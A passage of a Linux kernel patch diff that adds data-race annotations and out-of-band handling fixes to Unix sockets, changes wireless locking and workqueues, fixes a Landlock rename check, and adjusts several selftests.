+-	} else {
+-		if (mask == SK_FLAGS_SMC_TO_CLC)
+-			WRITE_ONCE(nsk->sk_rcvbuf,
+-				   READ_ONCE(nnet->ipv4.sysctl_tcp_rmem[1]));
+-		else
+-			WRITE_ONCE(nsk->sk_rcvbuf,
+-				   2 * READ_ONCE(nnet->smc.sysctl_rmem));
+-	}
+ }
+ 
+ static void smc_copy_sock_settings(struct sock *nsk, struct sock *osk,
+diff --git a/net/sunrpc/auth_gss/auth_gss.c b/net/sunrpc/auth_gss/auth_gss.c
+index 2d7b1e03110ae..3ef511d7af190 100644
+--- a/net/sunrpc/auth_gss/auth_gss.c
++++ b/net/sunrpc/auth_gss/auth_gss.c
+@@ -1858,8 +1858,10 @@ gss_wrap_req_priv(struct rpc_cred *cred, struct gss_cl_ctx *ctx,
+ 	offset = (u8 *)p - (u8 *)snd_buf->head[0].iov_base;
+ 	maj_stat = gss_wrap(ctx->gc_gss_ctx, offset, snd_buf, inpages);
+ 	/* slack space should prevent this ever happening: */
+-	if (unlikely(snd_buf->len > snd_buf->buflen))
++	if (unlikely(snd_buf->len > snd_buf->buflen)) {
++		status = -EIO;
+ 		goto wrap_failed;
++	}
+ 	/* We're assuming that when GSS_S_CONTEXT_EXPIRED, the encryption was
+ 	 * done anyway, so it's safe to put the request on the wire: */
+ 	if (maj_stat == GSS_S_CONTEXT_EXPIRED)
+diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
+index 7d2a3b42b456a..3905cdcaa5184 100644
+--- a/net/unix/af_unix.c
++++ b/net/unix/af_unix.c
+@@ -221,15 +221,9 @@ static inline int unix_may_send(struct sock *sk, struct sock *osk)
+ 	return unix_peer(osk) == NULL || unix_our_peer(sk, osk);
+ }
+ 
+-static inline int unix_recvq_full(const struct sock *sk)
+-{
+-	return skb_queue_len(&sk->sk_receive_queue) > sk->sk_max_ack_backlog;
+-}
+-
+ static inline int unix_recvq_full_lockless(const struct sock *sk)
+ {
+-	return skb_queue_len_lockless(&sk->sk_receive_queue) >
+-		READ_ONCE(sk->sk_max_ack_backlog);
++	return skb_queue_len_lockless(&sk->sk_receive_queue) > sk->sk_max_ack_backlog;
+ }
+ 
+ struct sock *unix_peer_get(struct sock *s)
+@@ -518,9 +512,9 @@ static int unix_dgram_peer_wake_me(struct sock *sk, struct sock *other)
+ 	return 0;
+ }
+ 
+-static int unix_writable(const struct sock *sk)
++static int unix_writable(const struct sock *sk, unsigned char state)
+ {
+-	return sk->sk_state != TCP_LISTEN &&
++	return state != TCP_LISTEN &&
+ 	       (refcount_read(&sk->sk_wmem_alloc) << 2) <= sk->sk_sndbuf;
+ }
+ 
+@@ -529,7 +523,7 @@ static void unix_write_space(struct sock *sk)
+ 	struct socket_wq *wq;
+ 
+ 	rcu_read_lock();
+-	if (unix_writable(sk)) {
++	if (unix_writable(sk, READ_ONCE(sk->sk_state))) {
+ 		wq = rcu_dereference(sk->sk_wq);
+ 		if (skwq_has_sleeper(wq))
+ 			wake_up_interruptible_sync_poll(&wq->wait,
+@@ -554,11 +548,10 @@ static void unix_dgram_disconnected(struct sock *sk, struct sock *other)
+ 		 * when peer was not connected to us.
+ 		 */
+ 		if (!sock_flag(other, SOCK_DEAD) && unix_peer(other) == sk) {
+-			other->sk_err = ECONNRESET;
++			WRITE_ONCE(other->sk_err, ECONNRESET);
+ 			sk_error_report(other);
+ 		}
+ 	}
+-	other->sk_state = TCP_CLOSE;
+ }
+ 
+ static void unix_sock_destructor(struct sock *sk)
+@@ -605,7 +598,7 @@ static void unix_release_sock(struct sock *sk, int embrion)
+ 	u->path.dentry = NULL;
+ 	u->path.mnt = NULL;
+ 	state = sk->sk_state;
+-	sk->sk_state = TCP_CLOSE;
++	WRITE_ONCE(sk->sk_state, TCP_CLOSE);
+ 
+ 	skpair = unix_peer(sk);
+ 	unix_peer(sk) = NULL;
+@@ -626,8 +619,8 @@ static void unix_release_sock(struct sock *sk, int embrion)
+ 			unix_state_lock(skpair);
+ 			/* No more writes */
+ 			WRITE_ONCE(skpair->sk_shutdown, SHUTDOWN_MASK);
+-			if (!skb_queue_empty(&sk->sk_receive_queue) || embrion)
+-				skpair->sk_err = ECONNRESET;
++			if (!skb_queue_empty_lockless(&sk->sk_receive_queue) || embrion)
++				WRITE_ONCE(skpair->sk_err, ECONNRESET);
+ 			unix_state_unlock(skpair);
+ 			skpair->sk_state_change(skpair);
+ 			sk_wake_async(skpair, SOCK_WAKE_WAITD, POLL_HUP);
+@@ -727,7 +720,8 @@ static int unix_listen(struct socket *sock, int backlog)
+ 	if (backlog > sk->sk_max_ack_backlog)
+ 		wake_up_interruptible_all(&u->peer_wait);
+ 	sk->sk_max_ack_backlog	= backlog;
+-	sk->sk_state		= TCP_LISTEN;
++	WRITE_ONCE(sk->sk_state, TCP_LISTEN);
++
+ 	/* set credentials so connect can copy them */
+ 	init_peercred(sk);
+ 	err = 0;
+@@ -966,7 +960,7 @@ static struct sock *unix_create1(struct net *net, struct socket *sock, int kern,
+ 	sk->sk_hash		= unix_unbound_hash(sk);
+ 	sk->sk_allocation	= GFP_KERNEL_ACCOUNT;
+ 	sk->sk_write_space	= unix_write_space;
+-	sk->sk_max_ack_backlog	= net->unx.sysctl_max_dgram_qlen;
++	sk->sk_max_ack_backlog	= READ_ONCE(net->unx.sysctl_max_dgram_qlen);
+ 	sk->sk_destruct		= unix_sock_destructor;
+ 	u = unix_sk(sk);
+ 	u->inflight = 0;
+@@ -1390,7 +1384,8 @@ static int unix_dgram_connect(struct socket *sock, struct sockaddr *addr,
+ 		if (err)
+ 			goto out_unlock;
+ 
+-		sk->sk_state = other->sk_state = TCP_ESTABLISHED;
++		WRITE_ONCE(sk->sk_state, TCP_ESTABLISHED);
++		WRITE_ONCE(other->sk_state, TCP_ESTABLISHED);
+ 	} else {
+ 		/*
+ 		 *	1003.1g breaking connected state with AF_UNSPEC
+@@ -1407,13 +1402,20 @@ static int unix_dgram_connect(struct socket *sock, struct sockaddr *addr,
+ 
+ 		unix_peer(sk) = other;
+ 		if (!other)
+-			sk->sk_state = TCP_CLOSE;
++			WRITE_ONCE(sk->sk_state, TCP_CLOSE);
+ 		unix_dgram_peer_wake_disconnect_wakeup(sk, old_peer);
+ 
+ 		unix_state_double_unlock(sk, other);
+ 
+-		if (other != old_peer)
++		if (other != old_peer) {
+ 			unix_dgram_disconnected(sk, old_peer);
++
++			unix_state_lock(old_peer);
++			if (!unix_peer(old_peer))
++				WRITE_ONCE(old_peer->sk_state, TCP_CLOSE);
++			unix_state_unlock(old_peer);
++		}
++
+ 		sock_put(old_peer);
+ 	} else {
+ 		unix_peer(sk) = other;
+@@ -1461,7 +1463,6 @@ static int unix_stream_connect(struct socket *sock, struct sockaddr *uaddr,
+ 	struct sk_buff *skb = NULL;
+ 	long timeo;
+ 	int err;
+-	int st;
+ 
+ 	err = unix_validate_addr(sunaddr, addr_len);
+ 	if (err)
+@@ -1520,7 +1521,7 @@ static int unix_stream_connect(struct socket *sock, struct sockaddr *uaddr,
+ 	if (other->sk_shutdown & RCV_SHUTDOWN)
+ 		goto out_unlock;
+ 
+-	if (unix_recvq_full(other)) {
++	if (unix_recvq_full_lockless(other)) {
+ 		err = -EAGAIN;
+ 		if (!timeo)
+ 			goto out_unlock;
+@@ -1545,9 +1546,7 @@ static int unix_stream_connect(struct socket *sock, struct sockaddr *uaddr,
+ 
+ 	   Well, and we have to recheck the state after socket locked.
+ 	 */
+-	st = sk->sk_state;
+-
+-	switch (st) {
++	switch (READ_ONCE(sk->sk_state)) {
+ 	case TCP_CLOSE:
+ 		/* This is ok... continue with connect */
+ 		break;
+@@ -1562,7 +1561,7 @@ static int unix_stream_connect(struct socket *sock, struct sockaddr *uaddr,
+ 
+ 	unix_state_lock_nested(sk, U_LOCK_SECOND);
+ 
+-	if (sk->sk_state != st) {
++	if (sk->sk_state != TCP_CLOSE) {
+ 		unix_state_unlock(sk);
+ 		unix_state_unlock(other);
+ 		sock_put(other);
+@@ -1614,7 +1613,7 @@ static int unix_stream_connect(struct socket *sock, struct sockaddr *uaddr,
+ 	copy_peercred(sk, other);
+ 
+ 	sock->state	= SS_CONNECTED;
+-	sk->sk_state	= TCP_ESTABLISHED;
++	WRITE_ONCE(sk->sk_state, TCP_ESTABLISHED);
+ 	sock_hold(newsk);
+ 
+ 	smp_mb__after_atomic();	/* sock_hold() does an atomic_inc() */
+@@ -2009,7 +2008,7 @@ static int unix_dgram_sendmsg(struct socket *sock, struct msghdr *msg,
+ 			unix_peer(sk) = NULL;
+ 			unix_dgram_peer_wake_disconnect_wakeup(sk, other);
+ 
+-			sk->sk_state = TCP_CLOSE;
++			WRITE_ONCE(sk->sk_state, TCP_CLOSE);
+ 			unix_state_unlock(sk);
+ 
+ 			unix_dgram_disconnected(sk, other);
+@@ -2185,7 +2184,7 @@ static int unix_stream_sendmsg(struct socket *sock, struct msghdr *msg,
+ 	}
+ 
+ 	if (msg->msg_namelen) {
+-		err = sk->sk_state == TCP_ESTABLISHED ? -EISCONN : -EOPNOTSUPP;
++		err = READ_ONCE(sk->sk_state) == TCP_ESTABLISHED ? -EISCONN : -EOPNOTSUPP;
+ 		goto out_err;
+ 	} else {
+ 		err = -ENOTCONN;
+@@ -2397,7 +2396,7 @@ static int unix_seqpacket_sendmsg(struct socket *sock, struct msghdr *msg,
+ 	if (err)
+ 		return err;
+ 
+-	if (sk->sk_state != TCP_ESTABLISHED)
++	if (READ_ONCE(sk->sk_state) != TCP_ESTABLISHED)
+ 		return -ENOTCONN;
+ 
+ 	if (msg->msg_namelen)
+@@ -2411,7 +2410,7 @@ static int unix_seqpacket_recvmsg(struct socket *sock, struct msghdr *msg,
+ {
+ 	struct sock *sk = sock->sk;
+ 
+-	if (sk->sk_state != TCP_ESTABLISHED)
++	if (READ_ONCE(sk->sk_state) != TCP_ESTABLISHED)
+ 		return -ENOTCONN;
+ 
+ 	return unix_dgram_recvmsg(sock, msg, size, flags);
+@@ -2683,18 +2682,18 @@ static struct sk_buff *manage_oob(struct sk_buff *skb, struct sock *sk,
+ 		if (skb == u->oob_skb) {
+ 			if (copied) {
+ 				skb = NULL;
+-			} else if (sock_flag(sk, SOCK_URGINLINE)) {
+-				if (!(flags & MSG_PEEK)) {
++			} else if (!(flags & MSG_PEEK)) {
++				if (sock_flag(sk, SOCK_URGINLINE)) {
+ 					WRITE_ONCE(u->oob_skb, NULL);
+ 					consume_skb(skb);
++				} else {
++					__skb_unlink(skb, &sk->sk_receive_queue);
++					WRITE_ONCE(u->oob_skb, NULL);
++					unlinked_skb = skb;
++					skb = skb_peek(&sk->sk_receive_queue);
+ 				}
+-			} else if (flags & MSG_PEEK) {
+-				skb = NULL;
+-			} else {
+-				__skb_unlink(skb, &sk->sk_receive_queue);
+-				WRITE_ONCE(u->oob_skb, NULL);
+-				unlinked_skb = skb;
+-				skb = skb_peek(&sk->sk_receive_queue);
++			} else if (!sock_flag(sk, SOCK_URGINLINE)) {
++				skb = skb_peek_next(skb, &sk->sk_receive_queue);
+ 			}
+ 		}
+ 
+@@ -2711,7 +2710,7 @@ static struct sk_buff *manage_oob(struct sk_buff *skb, struct sock *sk,
+ 
+ static int unix_stream_read_skb(struct sock *sk, skb_read_actor_t recv_actor)
+ {
+-	if (unlikely(sk->sk_state != TCP_ESTABLISHED))
++	if (unlikely(READ_ONCE(sk->sk_state) != TCP_ESTABLISHED))
+ 		return -ENOTCONN;
+ 
+ 	return unix_read_skb(sk, recv_actor);
+@@ -2735,7 +2734,7 @@ static int unix_stream_read_generic(struct unix_stream_read_state *state,
+ 	size_t size = state->size;
+ 	unsigned int last_len;
+ 
+-	if (unlikely(sk->sk_state != TCP_ESTABLISHED)) {
++	if (unlikely(READ_ONCE(sk->sk_state) != TCP_ESTABLISHED)) {
+ 		err = -EINVAL;
+ 		goto out;
+ 	}
+@@ -3060,7 +3059,7 @@ long unix_inq_len(struct sock *sk)
+ 	struct sk_buff *skb;
+ 	long amount = 0;
+ 
+-	if (sk->sk_state == TCP_LISTEN)
++	if (READ_ONCE(sk->sk_state) == TCP_LISTEN)
+ 		return -EINVAL;
+ 
+ 	spin_lock(&sk->sk_receive_queue.lock);
+@@ -3172,15 +3171,17 @@ static int unix_compat_ioctl(struct socket *sock, unsigned int cmd, unsigned lon
+ static __poll_t unix_poll(struct file *file, struct socket *sock, poll_table *wait)
+ {
+ 	struct sock *sk = sock->sk;
++	unsigned char state;
+ 	__poll_t mask;
+ 	u8 shutdown;
+ 
+ 	sock_poll_wait(file, sock, wait);
+ 	mask = 0;
+ 	shutdown = READ_ONCE(sk->sk_shutdown);
++	state = READ_ONCE(sk->sk_state);
+ 
+ 	/* exceptional events? */
+-	if (sk->sk_err)
++	if (READ_ONCE(sk->sk_err))
+ 		mask |= EPOLLERR;
+ 	if (shutdown == SHUTDOWN_MASK)
+ 		mask |= EPOLLHUP;
+@@ -3199,14 +3200,14 @@ static __poll_t unix_poll(struct file *file, struct socket *sock, poll_table *wa
+ 
+ 	/* Connection-based need to check for termination and startup */
+ 	if ((sk->sk_type == SOCK_STREAM || sk->sk_type == SOCK_SEQPACKET) &&
+-	    sk->sk_state == TCP_CLOSE)
++	    state == TCP_CLOSE)
+ 		mask |= EPOLLHUP;
+ 
+ 	/*
+ 	 * we set writable also when the other side has shut down the
+ 	 * connection. This prevents stuck sockets.
+ 	 */
+-	if (unix_writable(sk))
++	if (unix_writable(sk, state))
+ 		mask |= EPOLLOUT | EPOLLWRNORM | EPOLLWRBAND;
+ 
+ 	return mask;
+@@ -3217,15 +3218,18 @@ static __poll_t unix_dgram_poll(struct file *file, struct socket *sock,
+ {
+ 	struct sock *sk = sock->sk, *other;
+ 	unsigned int writable;
++	unsigned char state;
+ 	__poll_t mask;
+ 	u8 shutdown;
+ 
+ 	sock_poll_wait(file, sock, wait);
+ 	mask = 0;
+ 	shutdown = READ_ONCE(sk->sk_shutdown);
++	state = READ_ONCE(sk->sk_state);
+ 
+ 	/* exceptional events? */
+-	if (sk->sk_err || !skb_queue_empty_lockless(&sk->sk_error_queue))
++	if (READ_ONCE(sk->sk_err) ||
++	    !skb_queue_empty_lockless(&sk->sk_error_queue))
+ 		mask |= EPOLLERR |
+ 			(sock_flag(sk, SOCK_SELECT_ERR_QUEUE) ? EPOLLPRI : 0);
+ 
+@@ -3241,19 +3245,14 @@ static __poll_t unix_dgram_poll(struct file *file, struct socket *sock,
+ 		mask |= EPOLLIN | EPOLLRDNORM;
+ 
+ 	/* Connection-based need to check for termination and startup */
+-	if (sk->sk_type == SOCK_SEQPACKET) {
+-		if (sk->sk_state == TCP_CLOSE)
+-			mask |= EPOLLHUP;
+-		/* connection hasn't started yet? */
+-		if (sk->sk_state == TCP_SYN_SENT)
+-			return mask;
+-	}
++	if (sk->sk_type == SOCK_SEQPACKET && state == TCP_CLOSE)
++		mask |= EPOLLHUP;
+ 
+ 	/* No write status requested, avoid expensive OUT tests. */
+ 	if (!(poll_requested_events(wait) & (EPOLLWRBAND|EPOLLWRNORM|EPOLLOUT)))
+ 		return mask;
+ 
+-	writable = unix_writable(sk);
++	writable = unix_writable(sk, state);
+ 	if (writable) {
+ 		unix_state_lock(sk);
+ 
+diff --git a/net/unix/diag.c b/net/unix/diag.c
+index 3438b7af09af5..1de7500b41b61 100644
+--- a/net/unix/diag.c
++++ b/net/unix/diag.c
+@@ -65,7 +65,7 @@ static int sk_diag_dump_icons(struct sock *sk, struct sk_buff *nlskb)
+ 	u32 *buf;
+ 	int i;
+ 
+-	if (sk->sk_state == TCP_LISTEN) {
++	if (READ_ONCE(sk->sk_state) == TCP_LISTEN) {
+ 		spin_lock(&sk->sk_receive_queue.lock);
+ 
+ 		attr = nla_reserve(nlskb, UNIX_DIAG_ICONS,
+@@ -103,8 +103,8 @@ static int sk_diag_show_rqlen(struct sock *sk, struct sk_buff *nlskb)
+ {
+ 	struct unix_diag_rqlen rql;
+ 
+-	if (sk->sk_state == TCP_LISTEN) {
+-		rql.udiag_rqueue = sk->sk_receive_queue.qlen;
++	if (READ_ONCE(sk->sk_state) == TCP_LISTEN) {
++		rql.udiag_rqueue = skb_queue_len_lockless(&sk->sk_receive_queue);
+ 		rql.udiag_wqueue = sk->sk_max_ack_backlog;
+ 	} else {
+ 		rql.udiag_rqueue = (u32) unix_inq_len(sk);
+@@ -136,7 +136,7 @@ static int sk_diag_fill(struct sock *sk, struct sk_buff *skb, struct unix_diag_r
+ 	rep = nlmsg_data(nlh);
+ 	rep->udiag_family = AF_UNIX;
+ 	rep->udiag_type = sk->sk_type;
+-	rep->udiag_state = sk->sk_state;
++	rep->udiag_state = READ_ONCE(sk->sk_state);
+ 	rep->pad = 0;
+ 	rep->udiag_ino = sk_ino;
+ 	sock_diag_save_cookie(sk, rep->udiag_cookie);
+@@ -165,7 +165,7 @@ static int sk_diag_fill(struct sock *sk, struct sk_buff *skb, struct unix_diag_r
+ 	    sock_diag_put_meminfo(sk, skb, UNIX_DIAG_MEMINFO))
+ 		goto out_nlmsg_trim;
+ 
+-	if (nla_put_u8(skb, UNIX_DIAG_SHUTDOWN, sk->sk_shutdown))
++	if (nla_put_u8(skb, UNIX_DIAG_SHUTDOWN, READ_ONCE(sk->sk_shutdown)))
+ 		goto out_nlmsg_trim;
+ 
+ 	if ((req->udiag_show & UDIAG_SHOW_UID) &&
+@@ -215,7 +215,7 @@ static int unix_diag_dump(struct sk_buff *skb, struct netlink_callback *cb)
+ 		sk_for_each(sk, &net->unx.table.buckets[slot]) {
+ 			if (num < s_num)
+ 				goto next;
+-			if (!(req->udiag_states & (1 << sk->sk_state)))
++			if (!(req->udiag_states & (1 << READ_ONCE(sk->sk_state))))
+ 				goto next;
+ 			if (sk_diag_dump(sk, skb, req, sk_user_ns(skb->sk),
+ 					 NETLINK_CB(cb->skb).portid,
+diff --git a/net/wireless/core.c b/net/wireless/core.c
+index 3fcddc8687ed4..22f67b64135d2 100644
+--- a/net/wireless/core.c
++++ b/net/wireless/core.c
+@@ -427,7 +427,7 @@ static void cfg80211_wiphy_work(struct work_struct *work)
+ 	if (wk) {
+ 		list_del_init(&wk->entry);
+ 		if (!list_empty(&rdev->wiphy_work_list))
+-			schedule_work(work);
++			queue_work(system_unbound_wq, work);
+ 		spin_unlock_irq(&rdev->wiphy_work_lock);
+ 
+ 		wk->func(&rdev->wiphy, wk);
+diff --git a/net/wireless/pmsr.c b/net/wireless/pmsr.c
+index 2bc647720cda5..d26daa0370e71 100644
+--- a/net/wireless/pmsr.c
++++ b/net/wireless/pmsr.c
+@@ -56,7 +56,7 @@ static int pmsr_parse_ftm(struct cfg80211_registered_device *rdev,
+ 	out->ftm.burst_period = 0;
+ 	if (tb[NL80211_PMSR_FTM_REQ_ATTR_BURST_PERIOD])
+ 		out->ftm.burst_period =
+-			nla_get_u32(tb[NL80211_PMSR_FTM_REQ_ATTR_BURST_PERIOD]);
++			nla_get_u16(tb[NL80211_PMSR_FTM_REQ_ATTR_BURST_PERIOD]);
+ 
+ 	out->ftm.asap = !!tb[NL80211_PMSR_FTM_REQ_ATTR_ASAP];
+ 	if (out->ftm.asap && !capa->ftm.asap) {
+@@ -75,7 +75,7 @@ static int pmsr_parse_ftm(struct cfg80211_registered_device *rdev,
+ 	out->ftm.num_bursts_exp = 0;
+ 	if (tb[NL80211_PMSR_FTM_REQ_ATTR_NUM_BURSTS_EXP])
+ 		out->ftm.num_bursts_exp =
+-			nla_get_u32(tb[NL80211_PMSR_FTM_REQ_ATTR_NUM_BURSTS_EXP]);
++			nla_get_u8(tb[NL80211_PMSR_FTM_REQ_ATTR_NUM_BURSTS_EXP]);
+ 
+ 	if (capa->ftm.max_bursts_exponent >= 0 &&
+ 	    out->ftm.num_bursts_exp > capa->ftm.max_bursts_exponent) {
+@@ -88,7 +88,7 @@ static int pmsr_parse_ftm(struct cfg80211_registered_device *rdev,
+ 	out->ftm.burst_duration = 15;
+ 	if (tb[NL80211_PMSR_FTM_REQ_ATTR_BURST_DURATION])
+ 		out->ftm.burst_duration =
+-			nla_get_u32(tb[NL80211_PMSR_FTM_REQ_ATTR_BURST_DURATION]);
++			nla_get_u8(tb[NL80211_PMSR_FTM_REQ_ATTR_BURST_DURATION]);
+ 
+ 	out->ftm.ftms_per_burst = 0;
+ 	if (tb[NL80211_PMSR_FTM_REQ_ATTR_FTMS_PER_BURST])
+@@ -107,7 +107,7 @@ static int pmsr_parse_ftm(struct cfg80211_registered_device *rdev,
+ 	out->ftm.ftmr_retries = 3;
+ 	if (tb[NL80211_PMSR_FTM_REQ_ATTR_NUM_FTMR_RETRIES])
+ 		out->ftm.ftmr_retries =
+-			nla_get_u32(tb[NL80211_PMSR_FTM_REQ_ATTR_NUM_FTMR_RETRIES]);
++			nla_get_u8(tb[NL80211_PMSR_FTM_REQ_ATTR_NUM_FTMR_RETRIES]);
+ 
+ 	out->ftm.request_lci = !!tb[NL80211_PMSR_FTM_REQ_ATTR_REQUEST_LCI];
+ 	if (out->ftm.request_lci && !capa->ftm.request_lci) {
+diff --git a/net/wireless/sysfs.c b/net/wireless/sysfs.c
+index a88f338c61d31..17ccb9c6091e8 100644
+--- a/net/wireless/sysfs.c
++++ b/net/wireless/sysfs.c
+@@ -5,7 +5,7 @@
+  *
+  * Copyright 2005-2006	Jiri Benc <jbenc@suse.cz>
+  * Copyright 2006	Johannes Berg <johannes@sipsolutions.net>
+- * Copyright (C) 2020-2021, 2023 Intel Corporation
++ * Copyright (C) 2020-2021, 2023-2024 Intel Corporation
+  */
+ 
+ #include <linux/device.h>
+@@ -137,7 +137,7 @@ static int wiphy_resume(struct device *dev)
+ 	if (rdev->wiphy.registered && rdev->ops->resume)
+ 		ret = rdev_resume(rdev);
+ 	rdev->suspended = false;
+-	schedule_work(&rdev->wiphy_work);
++	queue_work(system_unbound_wq, &rdev->wiphy_work);
+ 	wiphy_unlock(&rdev->wiphy);
+ 
+ 	if (ret)
+diff --git a/net/wireless/util.c b/net/wireless/util.c
+index f433f3fdd9e94..73b3648e1b4c3 100644
+--- a/net/wireless/util.c
++++ b/net/wireless/util.c
+@@ -2202,6 +2202,7 @@ int cfg80211_get_station(struct net_device *dev, const u8 *mac_addr,
+ {
+ 	struct cfg80211_registered_device *rdev;
+ 	struct wireless_dev *wdev;
++	int ret;
+ 
+ 	wdev = dev->ieee80211_ptr;
+ 	if (!wdev)
+@@ -2213,7 +2214,11 @@ int cfg80211_get_station(struct net_device *dev, const u8 *mac_addr,
+ 
+ 	memset(sinfo, 0, sizeof(*sinfo));
+ 
+-	return rdev_get_station(rdev, dev, mac_addr, sinfo);
++	wiphy_lock(&rdev->wiphy);
++	ret = rdev_get_station(rdev, dev, mac_addr, sinfo);
++	wiphy_unlock(&rdev->wiphy);
++
++	return ret;
+ }
+ EXPORT_SYMBOL(cfg80211_get_station);
+ 
+diff --git a/security/landlock/fs.c b/security/landlock/fs.c
+index d328965f32f7f..7b0e5976113c2 100644
+--- a/security/landlock/fs.c
++++ b/security/landlock/fs.c
+@@ -824,6 +824,7 @@ static int current_check_refer_path(struct dentry *const old_dentry,
+ 	bool allow_parent1, allow_parent2;
+ 	access_mask_t access_request_parent1, access_request_parent2;
+ 	struct path mnt_dir;
++	struct dentry *old_parent;
+ 	layer_mask_t layer_masks_parent1[LANDLOCK_NUM_ACCESS_FS] = {},
+ 		     layer_masks_parent2[LANDLOCK_NUM_ACCESS_FS] = {};
+ 
+@@ -870,9 +871,17 @@ static int current_check_refer_path(struct dentry *const old_dentry,
+ 	mnt_dir.mnt = new_dir->mnt;
+ 	mnt_dir.dentry = new_dir->mnt->mnt_root;
+ 
++	/*
++	 * old_dentry may be the root of the common mount point and
++	 * !IS_ROOT(old_dentry) at the same time (e.g. with open_tree() and
++	 * OPEN_TREE_CLONE).  We do not need to call dget(old_parent) because
++	 * we keep a reference to old_dentry.
++	 */
++	old_parent = (old_dentry == mnt_dir.dentry) ? old_dentry :
++						      old_dentry->d_parent;
++
+ 	/* new_dir->dentry is equal to new_dentry->d_parent */
+-	allow_parent1 = collect_domain_accesses(dom, mnt_dir.dentry,
+-						old_dentry->d_parent,
++	allow_parent1 = collect_domain_accesses(dom, mnt_dir.dentry, old_parent,
+ 						&layer_masks_parent1);
+ 	allow_parent2 = collect_domain_accesses(
+ 		dom, mnt_dir.dentry, new_dir->dentry, &layer_masks_parent2);
+diff --git a/tools/testing/cxl/test/mem.c b/tools/testing/cxl/test/mem.c
+index aa2df3a150518..6e9a89f54d94f 100644
+--- a/tools/testing/cxl/test/mem.c
++++ b/tools/testing/cxl/test/mem.c
+@@ -3,6 +3,7 @@
+ 
+ #include <linux/platform_device.h>
+ #include <linux/mod_devicetable.h>
++#include <linux/vmalloc.h>
+ #include <linux/module.h>
+ #include <linux/delay.h>
+ #include <linux/sizes.h>
+diff --git a/tools/testing/selftests/ftrace/test.d/dynevent/test_duplicates.tc b/tools/testing/selftests/ftrace/test.d/dynevent/test_duplicates.tc
+index d3a79da215c8b..5f72abe6fa79b 100644
+--- a/tools/testing/selftests/ftrace/test.d/dynevent/test_duplicates.tc
++++ b/tools/testing/selftests/ftrace/test.d/dynevent/test_duplicates.tc
+@@ -1,7 +1,7 @@
+ #!/bin/sh
+ # SPDX-License-Identifier: GPL-2.0
+ # description: Generic dynamic event - check if duplicate events are caught
+-# requires: dynamic_events "e[:[<group>/][<event>]] <attached-group>.<attached-event> [<args>]":README
++# requires: dynamic_events "e[:[<group>/][<event>]] <attached-group>.<attached-event> [<args>]":README events/syscalls/sys_enter_openat
+ 
+ echo 0 > events/enable
+ 
+diff --git a/tools/testing/selftests/ftrace/test.d/kprobe/kprobe_eventname.tc b/tools/testing/selftests/ftrace/test.d/kprobe/kprobe_eventname.tc
+index 1f6981ef7afa0..ba19b81cef39a 100644
+--- a/tools/testing/selftests/ftrace/test.d/kprobe/kprobe_eventname.tc
++++ b/tools/testing/selftests/ftrace/test.d/kprobe/kprobe_eventname.tc
+@@ -30,7 +30,8 @@ find_dot_func() {
+ 	fi
+ 
+ 	grep " [tT] .*\.isra\..*" /proc/kallsyms | cut -f 3 -d " " | while read f; do
+-		if grep -s $f available_filter_functions; then
++		cnt=`grep -s $f available_filter_functions | wc -l`;
++		if [ $cnt -eq 1 ]; then
+ 			echo $f
+ 			break
+ 		fi
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_join.sh b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+index 635a1624b47dc..51f68bb6bdb8a 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_join.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+@@ -2343,9 +2343,10 @@ remove_tests()
+ 	if reset "remove invalid addresses"; then
+ 		pm_nl_set_limits $ns1 3 3
+ 		pm_nl_add_endpoint $ns1 10.0.12.1 flags signal
++		# broadcast IP: no packet for this address will be received on ns1
++		pm_nl_add_endpoint $ns1 224.0.0.1 flags signal
+ 		pm_nl_add_endpoint $ns1 10.0.3.1 flags signal
+-		pm_nl_add_endpoint $ns1 10.0.14.1 flags signal
+-		pm_nl_set_limits $ns2 3 3
++		pm_nl_set_limits $ns2 2 2
+ 		run_tests $ns1 $ns2 10.0.1.1 0 -3 0 speed_10
+ 		chk_join_nr 1 1 1
+ 		chk_add_nr 3 3
+diff --git a/tools/testing/selftests/vm/compaction_test.c b/tools/testing/selftests/vm/compaction_test.c
+index 9b420140ba2ba..309b3750e57e1 100644
+--- a/tools/testing/selftests/vm/compaction_test.c
++++ b/tools/testing/selftests/vm/compaction_test.c
+@@ -33,7 +33,7 @@ int read_memory_info(unsigned long *memfree, unsigned long *hugepagesize)
+ 	FILE *cmdfile = popen(cmd, "r");
+ 
+ 	if (!(fgets(buffer, sizeof(buffer), cmdfile))) {
+-		perror("Failed to read meminfo\n");
++		ksft_print_msg("Failed to read meminfo: %s\n", strerror(errno));
+ 		return -1;
+ 	}
+ 
+@@ -44,7 +44,7 @@ int read_memory_info(unsigned long *memfree, unsigned long *hugepagesize)
+ 	cmdfile = popen(cmd, "r");
+ 
+ 	if (!(fgets(buffer, sizeof(buffer), cmdfile))) {
+-		perror("Failed to read meminfo\n");
++		ksft_print_msg("Failed to read meminfo: %s\n", strerror(errno));
+ 		return -1;
+ 	}
+ 
+@@ -62,14 +62,14 @@ int prereq(void)
+ 	fd = open("/proc/sys/vm/compact_unevictable_allowed",
+ 		  O_RDONLY | O_NONBLOCK);
+ 	if (fd < 0) {
+-		perror("Failed to open\n"
+-		       "/proc/sys/vm/compact_unevictable_allowed\n");
++		ksft_print_msg("Failed to open /proc/sys/vm/compact_unevictable_allowed: %s\n",
++			       strerror(errno));
+ 		return -1;
+ 	}
+ 
+ 	if (read(fd, &allowed, sizeof(char)) != sizeof(char)) {
+-		perror("Failed to read from\n"
+-		       "/proc/sys/vm/compact_unevictable_allowed\n");
++		ksft_print_msg("Failed to read from /proc/sys/vm/compact_unevictable_allowed: %s\n",
++			       strerror(errno));
+ 		close(fd);
+ 		return -1;
+ 	}
+@@ -78,15 +78,17 @@ int prereq(void)
+ 	if (allowed == '1')
+ 		return 0;
+ 
++	ksft_print_msg("Compaction isn't allowed\n");
+ 	return -1;
+ }
+ 
+-int check_compaction(unsigned long mem_free, unsigned int hugepage_size)
++int check_compaction(unsigned long mem_free, unsigned long hugepage_size)
+ {
+-	int fd;
++	unsigned long nr_hugepages_ul;
++	int fd, ret = -1;
+ 	int compaction_index = 0;
+-	char initial_nr_hugepages[10] = {0};
+-	char nr_hugepages[10] = {0};
++	char initial_nr_hugepages[20] = {0};
++	char nr_hugepages[20] = {0};
+ 
+ 	/* We want to test with 80% of available memory. Else, OOM killer comes
+ 	   in to play */
+@@ -94,18 +96,24 @@ int check_compaction(unsigned long mem_free, unsigned int hugepage_size)
